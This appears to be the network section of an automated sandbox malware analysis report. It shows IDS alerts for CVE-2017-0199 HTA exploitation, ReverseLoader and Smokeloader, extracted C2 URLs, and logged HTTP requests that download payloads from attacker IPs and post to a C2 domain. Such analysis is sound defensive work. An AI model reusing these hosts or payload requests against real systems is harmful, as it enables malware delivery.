          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.172.44.178:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 107.172.44.178:80
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.178:80 -> 192.168.2.22:49162
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.178:80 -> 192.168.2.22:49164
          Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49175 -> 46.173.214.24:80
          Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49176 -> 46.173.214.24:80
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49166
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49173
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.24 80
          Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
          Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
          Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
          Source: Joe Sandbox ViewIP Address: 5.45.108.48 5.45.108.48
          Source: Joe Sandbox ViewASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.172.44.178:80
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 107.172.44.178:80
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.172.44.178:80
          Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 46.173.214.24:80 -> 192.168.2.22:49175
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.178Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.172.44.178If-Range: "2c929-6272622c7ca10"
          Source: global trafficHTTP traffic detected: GET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.178Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 18 Nov 2024 01:50:06 GMTConnection: Keep-AliveHost: 107.172.44.178If-None-Match: "2c929-6272622c7ca10"
          Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ashjidrdhauflvyw.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
          Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1395Host: prolinice.ga
          Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49173 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.178
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE899D4B18 URLDownloadToFileW,6_2_000007FE899D4B18
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1023728.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: link.uebie.deConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.178Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.172.44.178If-Range: "2c929-6272622c7ca10"
          Source: global trafficHTTP traffic detected: GET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.178Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 18 Nov 2024 01:50:06 GMTConnection: Keep-AliveHost: 107.172.44.178If-None-Match: "2c929-6272622c7ca10"
          Source: global trafficHTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /53/WRFFRGT.txt HTTP/1.1Host: 107.172.44.178Connection: Keep-Alive
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: link.uebie.de
          Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
          Source: global trafficDNS traffic detected: DNS query: prolinice.ga
          Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ashjidrdhauflvyw.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 17:22:42 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 